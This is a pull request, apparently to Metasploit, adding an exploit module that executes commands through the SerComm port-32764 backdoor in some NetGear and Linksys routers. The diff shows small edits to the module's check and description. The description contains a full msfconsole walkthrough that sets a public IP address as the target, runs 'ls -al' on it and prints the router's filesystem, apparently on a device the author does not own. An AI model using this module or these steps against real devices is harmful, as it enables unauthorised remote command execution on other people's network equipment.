### PR TITLE
Added module for Sercomm Network Device Backdoor Command Injection

### DIFF
--- a/modules/exploits/linux/misc/sercomm_exec.rb
+++ b/modules/exploits/linux/misc/sercomm_exec.rb
@@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
         This module will cause remote code execution on several SerComm devices.
         These devices typically include routers from NetGear and Linksys.
+        Tested against NetGear DG834.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/linux/misc/sercomm_exec.rb
+++ b/modules/exploits/linux/misc/sercomm_exec.rb
@@ -4,7 +4,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStagerEcho
-  #include Msf::Exploit::CmdStagerPrintf
 
   def initialize(info={})
     super(update_info(info,
@@ -63,12 +62,9 @@ class Metasploit3 < Msf::Exploit::Remote
     when 'LE'
       print_status("Detected Little Endian")
       return Msf::Exploit::CheckCode::Vulnerable
-    else
-      print_error("Connection failed: #{e.class}: #{e}")
     end
 
     return Msf::Exploit::CheckCode::Unknown
-
   end
 
   def exploit
@@ -87,9 +83,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
       disconnect
 
-      if res.start_with?("MMcS")
+      if (res && res.start_with?("MMcS"))
         return 'BE'
-      elsif res.start_with?("ScMM")
+      elsif (res && res.start_with?("ScMM"))
         return 'LE'
       end
     rescue Rex::ConnectionError => e


### PR DESCRIPTION
I saw the awesome new backdoor in some Linksys and NetGear devices over at https://github.com/elvanderb/TCP-32764 and thought it could make some nice Metasploit modules. Here's a module to execute commands through the backdoor.

```
msf > use exploit/unix/misc/sercomm_exec
msf exploit(sercomm_exec) > set rhost 88.96.225.246
rhost => 88.96.225.246
msf exploit(sercomm_exec) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(sercomm_exec) > set cmd "ls -al"
cmd => ls -al
msf exploit(sercomm_exec) > show options

Module options (exploit/unix/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  88.96.225.246    yes       The target address
   RPORT  32764            yes       The target port


Payload options (cmd/unix/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   ls -al           yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(sercomm_exec) > exploit

[*] Result of the command:
drwxr-xr-x    1 1009     1016           75 Apr 14  2010 .svn
lrwxrwxrwx    1 1009     1016            9 Apr 14  2010 bin -> usr/sbin/
drwxr-xr-x    1 0        0               0 Jan  1  1970 dev
lrwxrwxrwx    1 1009     1016            8 Apr 14  2010 etc -> /tmp/etc
drwxr-xr-x    1 1009     1016          489 Apr 14  2010 lib
dr-xr-xr-x   44 0        0               0 Jan  1  2000 proc
lrwxrwxrwx    1 1009     1016            9 Apr 14  2010 sbin -> usr/sbin/
drwxr-xr-x    1 1009     1016          314 Apr 14  2010 sharedband
drwxr-xr-x    4 0        0               0 Jan  3 01:58 tmp
drwxr-xr-x    1 1009     1016           75 Apr 14  2010 usr
lrwxrwxrwx    1 1009     1016            8 Apr 14  2010 var -> /tmp/var
lrwxrwxrwx    1 1009     1016            7 Apr 14  2010 www -> www.eng
drwxr-xr-x    1 1009     1016         3423 Apr 14  2010 www.eng

msf exploit(sercomm_exec) >
```
